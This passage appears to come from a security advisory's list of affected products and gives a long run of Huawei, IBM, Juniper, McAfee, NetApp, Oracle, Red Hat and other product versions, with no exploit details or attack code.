V100R003C02SPC100 \n * Huawei FusionStorage DSware V100R003C02SPC200 \n * Huawei FusionStorage DSware V100R003C02SPC201 \n * Huawei GTSOFTX3000 V200R001C01SPC100 \n * Huawei GalaX8800 V100R002C00 \n * Huawei GalaX8800 V100R002C01 \n * Huawei GalaX8800 V100R002C85 \n * Huawei GalaX8800 V100R003C10CP6001 \n * Huawei High-Density Server DH310 V2 V100R001C00 \n * Huawei High-Density Server DH320 V2 V100R001C00 \n * Huawei High-Density Server DH321 V2 V100R002C00 \n * Huawei High-Density Server DH620 V2 V100R001C00 \n * Huawei High-Density Server DH621 V2 V100R001C00 \n * Huawei High-Density Server DH628 V2 V100R001C00 \n * Huawei High-Density Server XH310 V2 V100R001C00 \n * Huawei High-Density Server XH320 V2 V100R001C00 \n * Huawei High-Density Server XH321 V2 V100R002C00 \n * Huawei High-Density Server XH621 V2 V100R001C00 \n * Huawei HyperDP OceanStor N8500 V200R001C09 \n * Huawei HyperDP OceanStor N8500 V200R001C91 \n * Huawei ManageOne V100R001C01 (BMS) \n * Huawei ManageOne V100R001C02 (SSMC) \n * Huawei ManageOne V100R002C00 (SSM) \n * Huawei ManageOne V100R002C00 (UMP) \n * Huawei ManageOne V100R002C10 (OC) \n * Huawei ManageOne V100R002C10 (SC) \n * Huawei ManageOne V100R002C10 (SSM) \n * Huawei ManageOne V100R002C20 (OC) \n * Huawei ManageOne V100R002C20 (SC) \n * Huawei NVS V100R002 \n * Huawei OIC V100R001C00 \n * Huawei OMM Solution V100R001 \n * Huawei OceanStor 18500 V100R001C00 \n * Huawei OceanStor 18800 V100R001C00 \n * Huawei OceanStor 18800F V100R001C00 \n * Huawei OceanStor 9000 V100R001C01 \n * Huawei OceanStor 9000 V100R001C10 \n * Huawei OceanStor 9000E V100R001C01 \n * Huawei OceanStor 9000E V100R002C00 \n * Huawei OceanStor 9000E V100R002C19 \n * Huawei OceanStor CSE V100R001C01 \n * Huawei OceanStor CSE V100R002C00LHWY01 \n * Huawei OceanStor CSE V100R002C00LSFM01 \n * Huawei OceanStor CSE V100R002C10 \n * Huawei OceanStor CSE V100R003C00 \n * Huawei OceanStor CSS V100R001C00 \n * Huawei OceanStor CSS V100R001C01 \n * Huawei OceanStor CSS V100R001C02 \n * Huawei OceanStor CSS V100R001C03 \n * Huawei OceanStor CSS V100R001C05 \n * Huawei OceanStor CSS V100R002C00 \n * Huawei OceanStor Dorado 2100 G2 V100R001C00 \n * Huawei OceanStor Dorado2100 V100R001C00 \n * Huawei OceanStor Dorado5100 V100R001C00 \n * Huawei OceanStor HDP3500E V100R002C00 \n * Huawei OceanStor HDP3500E V100R003C00 \n * Huawei OceanStor HVS85T V100R001C00 \n * Huawei OceanStor HVS85T V100R001C99 \n * Huawei OceanStor HVS88T V100R001C00 \n * Huawei OceanStor N8000 OceanStor S2300 V100R001C02 \n * Huawei OceanStor N8300 V100R002C00 \n * Huawei OceanStor N8500 V100R002C00 \n * Huawei OceanStor S2200T V100R005C00 \n * Huawei OceanStor S2200T V100R005C02 \n * Huawei OceanStor S2200T V100r005c01 \n * Huawei OceanStor S2600 V100R001C02 \n * Huawei OceanStor S2600 V100R005C02 \n * Huawei OceanStor S2600T V100R002C00 \n * Huawei OceanStor S2600T V100R002C01 \n * Huawei OceanStor S2600T V100R003C00 \n * Huawei OceanStor S2600T V100R005C00 \n * Huawei OceanStor S2600T V100R005C02 \n * Huawei OceanStor S2600T V100r005c01 \n * Huawei OceanStor S2600T V200R002C00 \n * Huawei OceanStor S3900 V100R001C00 \n * Huawei OceanStor S3900 V100R002C00 \n * Huawei OceanStor S5300 V100R001C01 \n * Huawei OceanStor S5300 V100R005C02 \n * Huawei OceanStor S5500 V100R001C01 \n * Huawei OceanStor S5500 V100R005C02 \n * Huawei OceanStor S5500T V100R001C00 \n * Huawei OceanStor S5500T V100R001C01 \n * Huawei OceanStor S5500T V100R002C00 \n * Huawei OceanStor S5500T V100R002C01 \n * Huawei OceanStor S5500T V100R003C00 \n * Huawei OceanStor S5500T V100R005C00 \n * Huawei OceanStor S5500T V100R005C02 \n * Huawei OceanStor S5500T V100r005c01 \n * Huawei OceanStor S5500T V200R002C00 \n * Huawei OceanStor S5600 V100R001C01 \n * Huawei OceanStor S5600 V100R005C02 \n * Huawei OceanStor S5600T V100R001C00 \n * Huawei OceanStor S5600T V100R001C01 \n * Huawei OceanStor S5600T V100R002C00 \n * Huawei OceanStor S5600T V100R002C01 \n * Huawei OceanStor S5600T V100R003C00 \n * Huawei OceanStor S5600T V100R005C00 \n * Huawei OceanStor S5600T V100R005C02 \n * Huawei OceanStor S5600T V100r005c01 \n * Huawei OceanStor S5600T V200R002C00 \n * Huawei OceanStor S5800T V100R001C00 \n * Huawei OceanStor S5800T V100R001C01 \n * Huawei OceanStor S5800T V100R002C00 \n * Huawei OceanStor S5800T V100R002C01 \n * Huawei OceanStor S5800T V100R003C00 \n * Huawei OceanStor S5800T V100R005C00 \n * Huawei OceanStor S5800T V100R005C02 \n * Huawei OceanStor S5800T V100r005c01 \n * Huawei OceanStor S5800T V200R001C00 \n * Huawei OceanStor S5800T V200R002C00 \n * Huawei OceanStor S5800T V200R002C10 \n * Huawei OceanStor S5800T V200R002C20 \n * Huawei OceanStor S5900 V100R001C00 \n * Huawei OceanStor S5900 V100R002C00 \n * Huawei OceanStor S6800E V100R005C02 \n * Huawei OceanStor S6800T V100R001C00 \n * Huawei OceanStor S6800T V100R001C01 \n * Huawei OceanStor S6800T V100R002C00 \n * Huawei OceanStor S6800T V100R002C01 \n * Huawei OceanStor S6800T V100R003C00 \n * Huawei OceanStor S6800T V100R005C00 \n * Huawei OceanStor S6800T V100R005C02 \n * Huawei OceanStor S6800T V100R005C30 \n * Huawei OceanStor S6800T V100R005C50 \n * Huawei OceanStor S6800T V100r005c01 \n * Huawei OceanStor S6800T V200R002C00 \n * Huawei OceanStor S6900 V100R001C00 \n * Huawei OceanStor S6900 V100R002C00 \n * Huawei OceanStor S8100 V100R002C00 \n * Huawei OceanStor SNS2120 V100R001C00 \n * Huawei OceanStor SNS5120 V100R001C00 \n * Huawei OceanStor UDS V100R001C00 \n * Huawei OceanStor UDS V100R002C00 \n * Huawei OceanStor UDS V100R002C00LVDF0 \n * Huawei OceanStor UDS V100R002C01 \n * Huawei OceanStor V1500 V100R001C02 \n * Huawei OceanStor V1800 V100R001C02 \n * Huawei OceanStor VIS6600 V100R002C02 \n * Huawei OceanStor VIS6600T V200R003C10 \n * Huawei OceanStor VTL3500 V100R002C01 \n * Huawei OceanStor VTL6000 V100R003C01 \n * Huawei OceanStor VTL6000 V100R003C02 \n * Huawei OceanStor VTL6900 V100R005C00 \n * Huawei Rack server RH1288 V2 V100R002C00 \n * Huawei Rack server RH2285 V2 V100R002C00 \n * Huawei Rack server RH2285H V2 V100R002C00 \n * Huawei Rack server RH2288 V2 V100R002C00 \n * Huawei Rack server RH2288E V2 V100R002C00 \n * Huawei Rack server RH2288H V2 V100R002C00 \n * Huawei Rack server RH2485 V2 V100R002C00 \n * Huawei Rack server RH5885 V2 V100R001C00 \n * Huawei Rack server RH5885 V3 V100R003C00 \n * Huawei Rack server RH5885H V3 V100R003C00 \n * Huawei SIG9800 SIG9800-X16 V300R001C00 \n * Huawei SIG9800 SIG9800-X16 V300R002C10 \n * Huawei UMA V100R001 \n * Huawei UMA V200R001 \n * Huawei UMA-DB V100R001C00 \n * Huawei VAE V100R001C01 \n * Huawei eLog V100R003 \n * Huawei eLog V200R003 \n * Huawei eSight NetWork V200R003C01 \n * Huawei eSight NetWork V200R003C10 \n * Huawei eSight UC&C V100R001C20 \n * Huawei eSight V300R001C00 \n * Huawei eSight V300R001C10 \n * Huawei eSpace CAD V100R001 \n * Huawei eSpace CC V100R001 \n * Huawei eSpace DCM V100R001 \n * Huawei eSpace DCM V100R002 \n * Huawei eSpace IVS V100R001 \n * Huawei eSpace Meeting V100R001 \n * Huawei eSpace U2980 V100R001 \n * Huawei eSpace U2990 V200R001 \n * Huawei eSpace UC V100R001 \n * Huawei eSpace UC V100R002 \n * Huawei eSpace UC V200R001 \n * Huawei eSpace UC V200R002 \n * Huawei eSpace UMS V200R002 \n * Huawei eSpace USM V100R001 \n * Huawei eSpace V1300N V1300N V100R002 \n * Huawei eSpace VCN3000 V100R001 \n * Huawei eSpace VTM V100R001 \n * Huawei iSOC V200R001 \n * IBM 2053-424 \n * IBM 2053-434 \n * IBM 2054-E01 \n * IBM 2054-E04 \n * IBM 2054-E07 \n * IBM 2054-E11 \n * IBM 2417-C48 \n * IBM 3722-S51 \n * IBM 3722-S52 \n * IBM 9710-E01 \n * IBM 9710-E08 \n * IBM AIX 5.3 \n * IBM AIX 6.1 \n * IBM AIX 7.1 \n * IBM Algo One Managed Data Service on Cloud \n * IBM Algo Risk Service On Cloud \n * IBM DS8000 \n * IBM Encryption Switch 2498-E32 \n * IBM FlashSystem 840 \n * IBM FlashSystem V840 \n * IBM Flex System 40Gb Ethernet \n * IBM Flex System Manager 1.1.0 \n * IBM Flex System Manager 1.2.0 \n * IBM Flex System Manager 1.2.1 \n * IBM Flex System Manager 1.3.0 \n * IBM Flex System Manager 1.3.0.1 \n * IBM Flex System Manager 1.3.1 \n * IBM Flex System Manager 1.3.2 \n * IBM Flex System Manager 1.3.2.0 \n * IBM Flex System V7000 6.1 \n * IBM Flex System V7000 6.3 \n * IBM Flex System V7000 6.4 \n * IBM Flex System V7000 7.1 \n * IBM Flex System V7000 7.2 \n * IBM Flex System V7000 7.3 \n * IBM HTTP Server 6.0.2 \n * IBM HTTP Server 6.1.0 \n * IBM HTTP Server 7.0 \n * IBM HTTP Server 8.0 \n * IBM HTTP Server 8.5 \n * IBM HTTP Server 8.5.5 \n * IBM Hyper-Scale Manager 1.5.0.58 \n * IBM IB6131 40Gb Infiniband Switch \n * IBM IBM Security Access Manager for Enterprise Single Sign-On 8.2 \n * IBM InfoSphere Balanced Warehouse C3000 \n * IBM InfoSphere Balanced Warehouse C4000 \n * IBM InfoSphere Guardium 8.2 \n * IBM InfoSphere Guardium 9.0 \n * IBM InfoSphere Guardium 9.1 \n * IBM Information Archive 1.1 \n * IBM Information Archive 1.2 \n * IBM Information Archive 2.1 \n * IBM Integration Bus 9.0.0.0 \n * IBM N series OnCommand 6.1R1 \n * IBM Policy Assessment and Compliance 7.5 \n * IBM Policy Assessment and Compliance 7.5.1 \n * IBM Power HMC 7 R7.3.0 \n * IBM Power HMC 7 R7.6.0 \n * IBM Power HMC 7 R7.7.0 \n * IBM Power HMC 7 R7.8.0 \n * IBM Power HMC 7 R7.9.0 \n * IBM Power HMC 8 R8.1.0 \n * IBM Privileged Identity Manager Virtual Appliance 1.0.1 \n * IBM Privileged Identity Manager Virtual Appliance 1.0.1.1 \n * IBM ProtecTIER Appliance Edition (PID 5639-PTB) \n * IBM ProtecTIER Enterprise Edition (PID 5639-PTA) \n * IBM ProtecTIER Entry Edition (PID 5639-PTC) \n * IBM Proventia Network Enterprise Scanner 2.3 \n * IBM PureApplication System 1.0 \n * IBM PureApplication System 1.1 \n * IBM PureApplication System 2.0 \n * IBM PureData System for Analytics 1.0.0 \n * IBM PureData System for Operational Analytics 1.0 \n * IBM PureData System for Transactions 1.0 \n * IBM QLogic 20-port 8Gb SAN Switch Module for IBM BladeCenter 7.10.1.29 \n * IBM QLogic 8 Gb Intelligent Pass-thru Module for IBM BladeCenter 7.10.1.29 \n * IBM QLogic Virtual Fabric Extension Module for IBM BladeCenter 9.0.3.05.00 \n * IBM QRadar Incident Forensics 7.2 MR2 \n * IBM QRadar Risk Manager 7.1 \n * IBM QRadar Security Information and Event Manager 7.2.0 \n * IBM QRadar Security Information and Event Manager 7.2.6 \n * IBM QRadar Vulnerability Manager 7.2.0 \n * IBM Real-time Compression Appliance 3.8.0 \n * IBM Real-time Compression Appliance 3.9.1 \n * IBM Real-time Compression Appliance 4.1.2 \n * IBM SAN Volume Controller \n * IBM SDN for Virtual Environments 1.0 \n * IBM SDN for Virtual Environments 1.1 \n * IBM SDN for Virtual Environments 1.2 \n * IBM Scale Out Network Attached Storage 1.4.3.0 \n * IBM Scale Out Network Attached Storage 1.4.3.1 \n * IBM Scale Out Network Attached Storage 1.4.3.2 \n * IBM Scale Out Network Attached Storage 1.4.3.3 \n * IBM Scale Out Network Attached Storage 1.4.3.4 \n * IBM Security Access Manager For Web 8.0 Firmware 8.0.0.2 \n * IBM Security Access Manager for Mobile 8.0.0.0 \n * IBM Security Access Manager for Mobile 8.0.0.1 \n * IBM Security Access Manager for Mobile 8.0.0.3 \n * IBM Security Access Manager for Mobile 8.0.0.4 \n * IBM Security Access Manager for Mobile 8.0.0.5 \n * IBM Security Access Manager for Web 7.0 \n * IBM Security Access Manager for Web 7.0.0.1 \n * IBM Security Access Manager for Web 7.0.0.2 \n * IBM Security Access Manager for Web 7.0.0.3 \n * IBM Security Access Manager for Web 7.0.0.4 \n * IBM Security Access Manager for Web 7.0.0.5 \n * IBM Security Access Manager for Web 7.0.0.7 \n * IBM Security Access Manager for Web 7.0.0.8 \n * IBM Security Access Manager for Web 7.0.0.9 \n * IBM Security Access Manager for Web 8.0.0.3 \n * IBM Security Access Manager for Web 8.0.0.4 \n * IBM Security Network Intrusion Prevention System GV1000 4.3 \n * IBM Security Network Intrusion Prevention System GV1000 4.4 \n * IBM Security Network Intrusion Prevention System GV1000 4.5 \n * IBM Security Network Intrusion Prevention System GV1000 4.6 \n * IBM Security Network Intrusion Prevention System GV1000 4.6.1 \n * IBM Security Network Intrusion Prevention System GV1000 4.6.2 \n * IBM Security Network Intrusion Prevention System GV200 4.3 \n * IBM Security Network Intrusion Prevention System GV200 4.4 \n * IBM Security Network Intrusion Prevention System GV200 4.5 \n * IBM Security Network Intrusion Prevention System GV200 4.6 \n * IBM Security Network Intrusion Prevention System GV200 4.6.1 \n * IBM Security Network Intrusion Prevention System GV200 4.6.2 \n * IBM Security Network Intrusion Prevention System GX3002 4.3 \n * IBM Security Network Intrusion Prevention System GX3002 4.4 \n * IBM Security Network Intrusion Prevention System GX3002 4.5 \n * IBM Security Network Intrusion Prevention System GX3002 4.6 \n * IBM Security Network Intrusion Prevention System GX3002 4.6.1 \n * IBM Security Network Intrusion Prevention System GX3002 4.6.2 \n * IBM Security Network Intrusion Prevention System GX4002 4.3 \n * IBM Security Network Intrusion Prevention System GX4002 4.4 \n * IBM Security Network Intrusion Prevention System GX4002 4.5 \n * IBM Security Network Intrusion Prevention System GX4002 4.6 \n * IBM Security Network Intrusion Prevention System GX4002 4.6.1 \n * IBM Security Network Intrusion Prevention System GX4002 4.6.2 \n * IBM Security Network Intrusion Prevention System GX4004 4.3 \n * IBM Security Network Intrusion Prevention System GX4004 4.4 \n * IBM Security Network Intrusion Prevention System GX4004 4.5 \n * IBM Security Network Intrusion Prevention System GX4004 4.6 \n * IBM Security Network Intrusion Prevention System GX4004 4.6.1 \n * IBM Security Network Intrusion Prevention System GX4004 4.6.2 \n * IBM Security Network Intrusion Prevention System GX4004-v2 4.3 \n * IBM Security Network Intrusion Prevention System GX4004-v2 4.4 \n * IBM Security Network Intrusion Prevention System GX4004-v2 4.5 \n * IBM Security Network Intrusion Prevention System GX4004-v2 4.6 \n * IBM Security Network Intrusion Prevention System GX4004-v2 4.6.1 \n * IBM Security Network Intrusion Prevention System GX4004-v2 4.6.2 \n * IBM Security Network Intrusion Prevention System GX5008 4.3 \n * IBM Security Network Intrusion Prevention System GX5008 4.4 \n * IBM Security Network Intrusion Prevention System GX5008 4.5 \n * IBM Security Network Intrusion Prevention System GX5008 4.6 \n * IBM Security Network Intrusion Prevention System GX5008 4.6.1 \n * IBM Security Network Intrusion Prevention System GX5008 4.6.2 \n * IBM Security Network Intrusion Prevention System GX5008-v2 4.3 \n * IBM Security Network Intrusion Prevention System GX5008-v2 4.4 \n * IBM Security Network Intrusion Prevention System GX5008-v2 4.5 \n * IBM Security Network Intrusion Prevention System GX5008-v2 4.6 \n * IBM Security Network Intrusion Prevention System GX5008-v2 4.6.1 \n * IBM Security Network Intrusion Prevention System GX5008-v2 4.6.2 \n * IBM Security Network Intrusion Prevention System GX5108 4.3 \n * IBM Security Network Intrusion Prevention System GX5108 4.4 \n * IBM Security Network Intrusion Prevention System GX5108 4.5 \n * IBM Security Network Intrusion Prevention System GX5108 4.6 \n * IBM Security Network Intrusion Prevention System GX5108 4.6.1 \n * IBM Security Network Intrusion Prevention System GX5108 4.6.2 \n * IBM Security Network Intrusion Prevention System GX5108-v2 4.3 \n * IBM Security Network Intrusion Prevention System GX5108-v2 4.4 \n * IBM Security Network Intrusion Prevention System GX5108-v2 4.5 \n * IBM Security Network Intrusion Prevention System GX5108-v2 4.6 \n * IBM Security Network Intrusion Prevention System GX5108-v2 4.6.1 \n * IBM Security Network Intrusion Prevention System GX5108-v2 4.6.2 \n * IBM Security Network Intrusion Prevention System GX5208 4.3 \n * IBM Security Network Intrusion Prevention System GX5208 4.4 \n * IBM Security Network Intrusion Prevention System GX5208 4.5 \n * IBM Security Network Intrusion Prevention System GX5208 4.6 \n * IBM Security Network Intrusion Prevention System GX5208 4.6.1 \n * IBM Security Network Intrusion Prevention System GX5208 4.6.2 \n * IBM Security Network Intrusion Prevention System GX5208-v2 4.3 \n * IBM Security Network Intrusion Prevention System GX5208-v2 4.4 \n * IBM Security Network Intrusion Prevention System GX5208-v2 4.5 \n * IBM Security Network Intrusion Prevention System GX5208-v2 4.6 \n * IBM Security Network Intrusion Prevention System GX5208-v2 4.6.1 \n * IBM Security Network Intrusion Prevention System GX5208-v2 4.6.2 \n * IBM Security Network Intrusion Prevention System GX6116 4.3 \n * IBM Security Network Intrusion Prevention System GX6116 4.4 \n * IBM Security Network Intrusion Prevention System GX6116 4.5 \n * IBM Security Network Intrusion Prevention System GX6116 4.6 \n * IBM Security Network Intrusion Prevention System GX6116 4.6.1 \n * IBM Security Network Intrusion Prevention System GX6116 4.6.2 \n * IBM Security Network Intrusion Prevention System GX7412 4.3 \n * IBM Security Network Intrusion Prevention System GX7412 4.4 \n * IBM Security Network Intrusion Prevention System GX7412 4.5 \n * IBM Security Network Intrusion Prevention System GX7412 4.6 \n * IBM Security Network Intrusion Prevention System GX7412 4.6.1 \n * IBM Security Network Intrusion Prevention System GX7412 4.6.2 \n * IBM Security Network Intrusion Prevention System GX7412-05 4.3 \n * IBM Security Network Intrusion Prevention System GX7412-05 4.4 \n * IBM Security Network Intrusion Prevention System GX7412-05 4.5 \n * IBM Security Network Intrusion Prevention System GX7412-05 4.6 \n * IBM Security Network Intrusion Prevention System GX7412-05 4.6.1 \n * IBM Security Network Intrusion Prevention System GX7412-05 4.6.2 \n * IBM Security Network Intrusion Prevention System GX7412-10 4.3 \n * IBM Security Network Intrusion Prevention System GX7412-10 4.4 \n * IBM Security Network Intrusion Prevention System GX7412-10 4.5 \n * IBM Security Network Intrusion Prevention System GX7412-10 4.6 \n * IBM Security Network Intrusion Prevention System GX7412-10 4.6.1 \n * IBM Security Network Intrusion Prevention System GX7412-10 4.6.2 \n * IBM Security Network Intrusion Prevention System GX7800 4.3 \n * IBM Security Network Intrusion Prevention System GX7800 4.4 \n * IBM Security Network Intrusion Prevention System GX7800 4.5 \n * IBM Security Network Intrusion Prevention System GX7800 4.6 \n * IBM Security Network Intrusion Prevention System GX7800 4.6.1 \n * IBM Security Network Intrusion Prevention System GX7800 4.6.2 \n * IBM Security Proventia Network Multi-Function Security System 4.6 \n * IBM Security Virtual Server Protection for VMware 1.1 \n * IBM Security Virtual Server Protection for VMware 1.1.0.1 \n * IBM Security Virtual Server Protection for VMware 1.1.1 \n * IBM Security Virtual Server Protection for VMware 1.1.1.0 \n * IBM Smart Analytics System 1050 \n * IBM Smart Analytics System 2050 \n * IBM Smart Analytics System 5600 \n * IBM Smart Analytics System 5710 \n * IBM Smart Analytics System 7600 \n * IBM Smart Analytics System 7700 \n * IBM Smart Analytics System 7710 \n * IBM SmartCloud Entry 2.3.0 \n * IBM SmartCloud Entry 2.4.0 \n * IBM SmartCloud Entry 3.1 \n * IBM SmartCloud Entry 3.2 \n * IBM SmartCloud Provisioning 2.1 FixPack 1 for SVA \n * IBM SmartCloud Provisioning 2.1 FixPack 2 for SVA \n * IBM SmartCloud Provisioning 2.1 FixPack 3 for SVA \n * IBM SmartCloud Provisioning 2.1 FixPack 4 Interim Fix 1 for SVA \n * IBM SmartCloud Provisioning 2.1 FixPack 4 for SVA \n * IBM SmartCloud Provisioning 2.1 FixPack 5 for SVA \n * IBM Starter Kit for Cloud 2.2.0 \n * IBM Storwize V3500 6.1 \n * IBM Storwize V3500 6.2 \n * IBM Storwize V3500 6.3 \n * IBM Storwize V3500 6.4 \n * IBM Storwize V3500 7.1 \n * IBM Storwize V3500 7.2 \n * IBM Storwize V3500 7.3 \n * IBM Storwize V3700 6.1 \n * IBM Storwize V3700 6.2 \n * IBM Storwize V3700 6.3 \n * IBM Storwize V3700 6.4 \n * IBM Storwize V3700 7.1 \n * IBM Storwize V3700 7.2 \n * IBM Storwize V3700 7.3 \n * IBM Storwize V5000 6.1 \n * IBM Storwize V5000 6.2 \n * IBM Storwize V5000 6.3 \n * IBM Storwize V5000 6.4 \n * IBM Storwize V5000 7.1 \n * IBM Storwize V5000 7.2 \n * IBM Storwize V5000 7.3 \n * IBM Storwize V7000 6.1 \n * IBM Storwize V7000 6.2 \n * IBM Storwize V7000 6.3 \n * IBM Storwize V7000 6.4 \n * IBM Storwize V7000 7.1 \n * IBM Storwize V7000 7.2 \n * IBM Storwize V7000 7.3 \n * IBM System Networking SAN24B-5 2498-F24 \n * IBM System Networking SAN96B-5 2498-F96 \n * IBM System Networking SAN96B-5 2498-N96 \n * IBM System Storage SAN04B-R 2005-R04 \n * IBM System Storage SAN06B-R 2498-R06 \n * IBM System Storage SAN24B-4 2498-B24 \n * IBM System Storage SAN384B 2499-192 \n * IBM System Storage SAN384B-2 2499-416 \n * IBM System Storage SAN40B-4 2498-B40 \n * IBM System Storage SAN48B-5 2498-F48 \n * IBM System Storage SAN768B 2499-384 \n * IBM System Storage SAN768B-2 2499-816 \n * IBM System Storage SAN80B-4 2498-B80 \n * IBM System Storage Storwize V7000 Unified 1.3 \n * IBM System Storage Storwize V7000 Unified 1.4 \n * IBM System Storage Storwize V7000 Unified 1.5 \n * IBM System X \n * IBM TSSC 7.0 \n * IBM TSSC 7.3 \n * IBM TSSC 7.3.15 \n * IBM TSSC 7.3.16 \n * IBM TotalStorage SAN16B-2 Fabric Switch 2005-B16 \n * IBM TotalStorage SAN256B Director Model M48 2109-M48 \n * IBM Unstructured Data Identification and Mgmt 7.5 \n * IBM Unstructured Data Identification and Mgmt 7.5.1 \n * IBM WebSphere Message Broker 8.0 \n * IBM WebSphere Process Server Hypervisor Edition 6.2 \n * IBM WebSphere Process Server Hypervisor Edition 7.0 \n * IBM WebSphere Process Server Hypervisor Edition for Novell SUSE 6.2 \n * IBM WebSphere Process Server Hypervisor Edition for Novell SUSE 7.0 \n * IBM WebSphere Process Server Hypervisor Edition for Red Hat 7.0 \n * IBM WebSphere Transformation Extender 8.4.0.0 \n * IBM WebSphere Transformation Extender 8.4.0.1 \n * IBM WebSphere Transformation Extender 8.4.0.2 \n * IBM WebSphere Transformation Extender 8.4.0.3 \n * IBM WebSphere Transformation Extender 8.4.0.4 \n * IBM WebSphere Transformation Extender 8.4.1.0 \n * IBM WebSphere Transformation Extender 8.4.1.1 \n * IBM WebSphere Transformation Extender 8.4.1.2 \n * IBM Worklight Quality Assurance 6.0 \n * IBM Workload Deployer 3.1 \n * IBM eDiscovery Identification and Collection 7.5 \n * IBM eDiscovery Identification and Collection 7.5.1 \n * IPFire IPFire 2.15 Update Core 82 \n * Juniper IDP 5.1 \n * Juniper IDP Series \n * Juniper JUNOS Space \n * Juniper Junos Space Ja1500 Appliance - \n * Juniper Junos Space Ja2500 Appliance - \n * Juniper NSM3000 Appliances 2012.2 \n * Juniper NSMXpress Appliances 2012.2 \n * Juniper Nsm3000 - \n * Juniper Nsmexpress - \n * Juniper STRM/JSA 2013.2 \n * Mageia Mageia \n * Mandriva Business Server 1 \n * Mandriva Business Server 1 X86 64 \n * McAfee Advanced Threat Defense 3.0.0 \n * McAfee Advanced Threat Defense 3.2.0 \n * McAfee Asset Manager 6.6 \n * McAfee Asset Manager Sensor 6.0 \n * McAfee Boot Attestation Service 3.0 \n * McAfee Cloud Identity Manager 3.0 \n * McAfee Cloud Identity Manager 3.1 \n * McAfee Cloud Identity Manager 3.5.1 \n * McAfee Cloud Single Sign On 4.0.0 \n * McAfee Cloud Single Sign On 4.0.1 \n * McAfee Email Gateway 7.0 \n * McAfee Email Gateway 7.0 Patch 1 \n * McAfee Email Gateway 7.0 Patch 3 \n * McAfee Email Gateway 7.0.1 \n * McAfee Email Gateway 7.0.2 \n * McAfee Email Gateway 7.0.3 \n * McAfee Email Gateway 7.0.4 \n * McAfee Email Gateway 7.5 \n * McAfee Email Gateway 7.5 Patch 1 \n * McAfee Email Gateway 7.5 Patch 2 \n * McAfee Email Gateway 7.5.1 \n * McAfee Email Gateway 7.6 \n * McAfee Email and Web Security Appliance 5.6 \n * McAfee Firewall Enterprise Control Center 5.2.0 \n * McAfee Firewall Enterprise Control Center 5.3.0 \n * McAfee Global Threat Intelligence (GTI) Proxy 2.0 \n * McAfee MOVE Antivirus Agentless 2.0 \n * McAfee MOVE Antivirus Agentless 3.0 \n * McAfee MOVE Antivirus Agentless 3.5 \n * McAfee MOVE Antivirus Multi-platform 2.0 \n * McAfee MOVE Antivirus Multi-platform 3.5 \n * McAfee MOVE Firewall 3.5 \n * McAfee MOVE Scheduler 2.0 \n * McAfee Move 2.6 \n * McAfee Network Data Loss Prevention 9.0 \n * McAfee Network Data Loss Prevention 9.1 \n * McAfee Network Data Loss Prevention 9.2.0 \n * McAfee Network Data Loss Prevention 9.2.1 \n * McAfee Network Data Loss Prevention 9.2.2 \n * McAfee Network Data Loss Prevention 9.3 \n * McAfee Network Security Manager 6.1.15.38 \n * McAfee Network Security Manager 6.1.15.39 \n * McAfee Network Security Manager 7.1.15.6 \n * McAfee Network Security Manager 7.1.15.7 \n * McAfee Network Security Manager 7.1.5.10 \n * McAfee Network Security Manager 7.1.5.14 \n * McAfee Network Security Manager 7.1.5.15 \n * McAfee Network Security Manager 7.5.5.8 \n * McAfee Network Security Manager 7.5.5.9 \n * McAfee Network Security Manager 8.0.0 \n * McAfee Network Security Manager 8.1.7.2 \n * McAfee Network Security Manager 8.1.7.3 \n * McAfee Network Security Sensor Appliance 6.0 \n * McAfee Network Security Sensor Appliance 7.1.0 \n * McAfee Network Security Sensor Appliance 7.5.0 \n * McAfee Network Security Sensor Appliance 8.0.0 \n * McAfee Network Security Sensor Appliance 8.1.0 \n * McAfee Next Generation Firewall 5.5.0 \n * McAfee Next Generation Firewall 5.5.6 \n * McAfee Next Generation Firewall 5.5.7 \n * McAfee Next Generation Firewall 5.7.0 \n * McAfee SIEM Enterprise Security Manager 9.1 \n * McAfee SIEM Enterprise Security Manager 9.2 \n * McAfee SIEM Enterprise Security Manager 9.3 \n * McAfee SSL VPN 1.5 \n * McAfee SaaS Email Protection 1.0 \n * McAfee SaaS Web Protection 1.0 \n * McAfee Web Gateway 7.2.0.9 \n * McAfee Web Gateway 7.3.2 \n * McAfee Web Gateway 7.3.2.10 \n * McAfee Web Gateway 7.3.2.2 \n * McAfee Web Gateway 7.3.2.4 \n * McAfee Web Gateway 7.3.2.6 \n * McAfee Web Gateway 7.3.2.8 \n * McAfee Web Gateway 7.3.2.9 \n * McAfee Web Gateway 7.3.2.9. \n * McAfee Web Gateway 7.4.0 \n * McAfee Web Gateway 7.4.1 \n * McAfee Web Gateway 7.4.1.3 \n * McAfee Web Gateway 7.4.2 \n * McAfee Web Gateway 7.4.2.1 \n * Meinberg LANTIME 4.0 \n * Meinberg LANTIME 5.0 \n * Meinberg LANTIME 6.00.0 \n * Meinberg LANTIME 6.14.0 \n * Meinberg LANTIME 6.15.0 \n * NetApp Clustered Data ONTAP \n * NetApp DATA ONTAP Edge \n * NetApp Data ONTAP 7-Mode \n * NetApp FlashRay \n * NetApp OnCommand Balance \n * NetApp OnCommand Performance Manager \n * NetApp OnCommand Unified Manager for Clustered Data ONTAP \n * NetApp SnapProtect Linux MediaAgent OVA template \n * NetApp StorageGRID \n * NetApp VASA Provider for Clustered Data ONTAP \n * OpenVPN OpenVPN 2.2.29 \n * Oracle Audit Vault and Database Firewall \n * Oracle Big Data Appliance \n * Oracle Database Appliance 12.1.2 \n * Oracle Database Appliance 2 \n * Oracle Enterprise Linux 4 \n * Oracle Enterprise Linux 6 \n * Oracle Enterprise Linux 6.2 \n * Oracle Exadata Storage Server Software \n * Oracle Exalogic \n * Oracle Exalytics \n * Oracle Key Vault \n * Oracle Linux 4 \n * Oracle Linux 5 \n * Oracle Linux 6 \n * Oracle Linux 7 \n * Oracle Solaris 10 \n * Oracle Solaris 11 \n * Oracle Solaris 11.2 \n * Oracle Solaris 8 \n * Oracle Solaris 9 \n * Oracle SuperCluster \n * Oracle VM VirtualBox 2.2 \n * Oracle VM VirtualBox 3.1 \n * Oracle VM VirtualBox 3.2 \n * Oracle VM VirtualBox 3.3 \n * Oracle Virtual Compute Appliance Software \n * Paloaltonetworks PAN-OS \n * Paloaltonetworks Panorama \n * Qnap QTS 3.0.8 \n * Qnap QTS 4.1.0 \n * Qnap QTS 4.1.1 \n * Qnap QTS 4.3.0 \n * Redhat Enterprise Linux 5 Server \n * Redhat Enterprise Linux Desktop 5 Client \n * Redhat Enterprise Linux Desktop 6 \n * Redhat Enterprise Linux Desktop 7 \n * Redhat Enterprise Linux ELS 4 \n * Redhat Enterprise Linux EUS 5.9.z server 